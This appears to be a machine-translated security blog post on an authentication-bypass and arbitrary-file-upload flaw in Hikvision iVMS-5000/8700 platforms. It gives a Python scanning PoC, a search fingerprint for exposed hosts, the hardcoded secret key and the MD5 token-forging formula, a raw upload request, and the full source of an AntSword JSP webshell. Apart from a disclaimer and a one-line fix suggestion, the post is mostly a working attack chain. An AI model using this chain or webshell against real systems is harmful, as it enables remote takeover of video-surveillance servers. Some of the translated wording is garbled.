Statement:
This article is only for technical exchanges. Please do not use it for illegal purposes.
Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article are the responsibility of the user himself. The author of the article does not bear any responsibility for this. responsibility.
I. Overview
product description
Hikvision iVMS centralized monitoring application management platform is oriented towards security business applications and based on video image applications. It integrates multiple security application systems such as video surveillance, networked alarms, intelligent analysis, and operation and maintenance management to build A comprehensive multi-business application management platform.
2. Vulnerability description
The Hikvision iVMS system has an in-the-wild 0day vulnerability. An attacker can obtain the key to construct a token arbitrarily and request the /resourceOperations/upload interface to upload files arbitrarily, thereby obtaining server webshell permissions and executing malicious code remotely.
3. Scope of influence
Hikvision integrated security system iVMS-5000
Hikvision integrated security system iVMS-8700
Eagle print
web.body="/views/home/file/installPackage.rar"
4. POC script
POC written by the boss, download address (but I tried the POC many times to detect the vulnerability, but I couldn't reproduce it manually)
Detection script PoC: https://github.com/sccmdaveli/hikvision-poc
If you don’t have access to github, you can be responsible for the source code below
import requests
import urllib3
import urllib
import hashlib
import argparse
from colorama import init
from colorama import Fore
init(autoreset=True)
urllib3.disable_warnings()
head = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
"Cookie": "ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169"
}
def md5encode(url):
if url.endswith("/"):
path = "eps/api/resourceOperations/uploadsecretKeyIbuilding"
else:
path = "/eps/api/resourceOperations/uploadsecretKeyIbuilding"
encodetext = url + path
input_name = hashlib.md5()
input_name.update(encodetext.encode("utf-8"))
return (input_name.hexdigest()).upper()
def poc(url):
if url.endswith("/"):
path = "eps/api/resourceOperations/upload?token="
else:
path = "/eps/api/resourceOperations/upload?token="
pocurl = url + path + md5encode(url)
data = {
"service": urllib.parse.quote(url + "/home/index.action")
}
try:
response = requests.post(url=pocurl,headers=head,data=data,verify=False,timeout=3)
if response.status_code==200:
print(Fore.GREEN + f"[+]{url}存在海康威视iVMS 综合安防任意文件上传漏洞!!!!")
else:
print(Fore.RED + f"[-]{url}不存在海康威视iVMS 综合安防任意文件上传漏洞")
except:
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser(usage='python3 ivms.py -u http://xxxx\npython3 ivms.py -f file.txt',
description='ivms漏洞检测poc',
)
p = parser.add_argument_group('ivms 的参数')
p.add_argument("-u", "--url", type=str, help="测试单条url")
p.add_argument("-f", "--file", type=str, help="测试多个url文件")
args = parser.parse_args()
if args.url:
poc(args.url)
if args.file:
for i in open(args.file,"r").read().split("\n"):
poc(i)How to use:
Single url detection: python3 ivms-poc.py -u url
Multiple url detection: python3 ivms-poc.py -f file.txt
5. Recurrence of vulnerabilities
Vulnerability URL:/eps/api/resourceOperations/upload
Note that the parameter transfer method is POST
bp grabs the homepage package and tries to access the interface (it is found that the token needs to be authenticated), and the token empty! field appears in the returned package.
Construct a token to bypass authentication (internal mechanism: if the token value is the same as the md5 value of the request url+secretkey, authentication can be bypassed)
The secretkey is hard-coded in the code (default value: secretKeyIbuilding)
The token value needs to be MD5 encrypted (32-bit uppercase)
Combination: token=MD5(url+"secretKeyIbuilding")
revalidate
Successfully bypassed, constructed file upload payload
POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo
Upgrade-Insecure-Requests: 1
Content-Length: 174
------WebKitFormBoundaryGEJwiloiPo
Content-Disposition: form-data; name="fileUploader";filename="1.jsp"
Content-Type: image/jpeg
test
------WebKitFormBoundaryGEJwiloiPo
It shows that the upload is successful and the resourceUuid value is returned.
Verification path: http://url/eps/upload/resourceUuid value.jsp
6. Exploiting vulnerabilities
Directly upload the Ant Sword jsp Trojan
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("passwd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
Upload successful, try to connect
7. Repair suggestions
Turn off the access permissions for Internet exposure, and perform strong permission authentication in the file upload module.
The original link of the boss: https://blog.csdn.net/qq_41904294/article/details/130807691